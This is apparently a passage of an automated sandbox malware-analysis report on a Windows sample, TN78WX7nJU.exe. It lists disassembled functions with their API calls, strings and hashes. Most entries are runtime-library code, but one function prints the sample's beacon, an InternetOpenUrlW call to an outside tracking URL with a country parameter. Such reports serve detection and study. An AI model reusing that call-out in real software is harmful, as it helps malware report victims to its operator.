InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024830A1

Strings

&cc=DE, xrefs: 0248301B, 02483021, 0248307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02482EBE, 02482FEA, 02483059

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: 3a708d444c607f1697bd817b8d7f1749b0c8bc1023139c773399686e55acc755
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: 4F5153A5E65344A8E320EFB0BC55B763378FF58712F10543BD528CB2B2E7A19944871E

Function 024A8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 024A896A
__IsNonwritableInCurrentImage.LIBCMT ref: 024A8A23

Strings

csm, xrefs: 024A8A0D
fB, xrefs: 024A8A15, 024A8A1E, 024A8A2F

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: df6fa2852c09fe5f23a0799c00fc7f7790f618e07e14ce8f3082f429940796be
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 4941F430A00248DBCF10DF29C864AAEBFB5FF55328F14816BE9155B391D7329A01CF91

Function 024AF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TN78WX7nJU.exe,00000104), ref: 024AF9BA
_free.LIBCMT ref: 024AFA85
_free.LIBCMT ref: 024AFA8F

Strings

C:\Users\user\Desktop\TN78WX7nJU.exe, xrefs: 024AF9B1, 024AF9B8, 024AF9E7, 024AFA1F

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TN78WX7nJU.exe
API String ID: 2506810119-3664027380
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: 90670392e91c76f0de834511ec291e6364f03e4880f5e8065bfcdd84af91bb2b
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: A5319F71A00218EBDB21DF9ADC909DEBBFCEFA9710B11406BE80597621D7719A45CBA0

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TN78WX7nJU.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\TN78WX7nJU.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\TN78WX7nJU.exe
API String ID: 2506810119-3664027380
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0248C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0248C8DE

Strings

ios_base::badbit set, xrefs: 0248C8A1, 0248C8C1
ios_base::failbit set, xrefs: 0248C8AB
ios_base::eofbit set, xrefs: 0248C8B0

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: e156c074c35c76abf7a167dc6cb9f16a5921ac0b2c9ea4de9ba6ca0abff0be3e
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: C9F02BB28902086BCB08F554CC81BEF33989B15316F04806FEE42AB182EB689945CBB4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 1990795212-2046700901
Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8

Function 0042E03D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 21COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
_free.LIBCMT ref: 0042E069

Strings

B, xrefs: 0042E043, 0042E068

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: CloseFreeHandleLibrary_free
String ID: B
API String ID: 621396759-3071617958
Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98

Function 00415D8A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
__CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8

Strings

version, xrefs: 00415D9F
pScheduler, xrefs: 00415DB2

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 1687795959-3154422776
Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E

Function 024B5AFF Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 024B5B8A
__alldvrm.LIBCMT ref: 024B5D8B
__alldvrm.LIBCMT ref: 024B5DAD

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction ID: f0edb284ff9d10d3d76a5d0d67dae2d2e15d3feffadf350e7c9a46ec075d46fd
Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
Instruction Fuzzy Hash: 3EA136759043869FDB238F28C8917EEFBA6EF15310F58826FD5859B381C7348942CB60

Function 00435898 Relevance: 6.3, APIs: 4, Instructions: 305COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00435923
__alldvrm.LIBCMT ref: 00435B24
__alldvrm.LIBCMT ref: 00435B46

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759

Function 024BFC6F Relevance: 6.2, APIs: 4, Instructions: 152COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024BFD9E

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction ID: 095c710ee9e994dcb2b9cfb679337f9f9b236fc9f4050e306e2b2a75d027de5c
Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
Instruction Fuzzy Hash: 36411B31A001016BDB276FBA8C54BEF3A6EEF55770F15062BF42DD6690D73444498A71

Function 0043FA08 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0043FB37

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D

Function 024B6B04 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024B047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024B6B51
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024B6BDA
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024B6BEC
__freea.LIBCMT ref: 024B6BF5

Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction ID: 63321ccd77c4759da82375cd2f086b743bbe8154c7d3b96501322c6172a1f708
Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
Instruction Fuzzy Hash: CB31A072A0021AABDF269F65CC80DEF7BB9EF40714B0A426EEC14D7250E735D951CBA0

Function 004236EF Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,00000000), ref: 00423739
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721

Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D

__CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
String ID:
API String ID: 2630251706-0
Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98

Function 00401F9A Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000005), ref: 00401FAF
UpdateWindow.USER32 ref: 00401FB7
ShowWindow.USER32(00000000), ref: 00401FCB
MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Window$Show$MoveUpdate
String ID:
API String ID: 1339878773-0
Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C

Function 024A9330 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 024A934A

Part of subcall function 024A9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024A92C6
Part of subcall function 024A9297: ___AdjustPointer.LIBCMT ref: 024A92E1

_UnwindNestedFrames.LIBCMT ref: 024A935F
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024A9370
CallCatchBlock.LIBVCRUNTIME ref: 024A9398

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: dd7902a0b168ea5682338f3260862cf75cc75035effb19eefb516b138c717781
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 1B011732100148BBCF125E96CC50EEB3F7AEF58754F05441AFE0896120D372E861EBA0

Function 004290C9 Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 004290E3

Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A

_UnwindNestedFrames.LIBCMT ref: 004290F8
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
CallCatchBlock.LIBVCRUNTIME ref: 00429131

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8

Function 024B5196 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378), ref: 024B51C8
GetLastError.KERNEL32(?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024B2213), ref: 024B51D4
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024B51E2

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 66b8974f1e5ee743916ce639f37f79aeb4b5764888c21c1d9fe9e225dac22382
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 8001F736A02322ABC7234F799C44E97FB98AF46FA27540631F906E7240C720D941CAF4

Function 00434F2F Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC

Function 024A6395 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024A63AF
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024A63C3
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024A63DB
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024A63F3

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction ID: 3bec27d665a3d3717b1a3808e02f7a4e078401cc44891030c8c417e18893cc7d
Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
Instruction Fuzzy Hash: 9601D632600114B7CF16EE5AC860AAF779E9F65750F05005BEC21AB381DAB0ED128BA0

Function 024A2B82 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF

Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8

Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8

Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1

Memory Dump Source

Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
String ID:
API String ID: 2250070497-0
Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction ID: a6b3322d4b83997d53398a9e39bde1422cbac09e96d07a3371cc48c22dd9c190
Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
Instruction Fuzzy Hash: C1117C76400204AFC715DF65C880ACAFBF9BF59320B014A1EE9568B591DBB0A914CBA0

Function 0042612E Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C

Memory Dump Source

Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd

Similarity

API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
String ID:
API String ID: 78362717-0
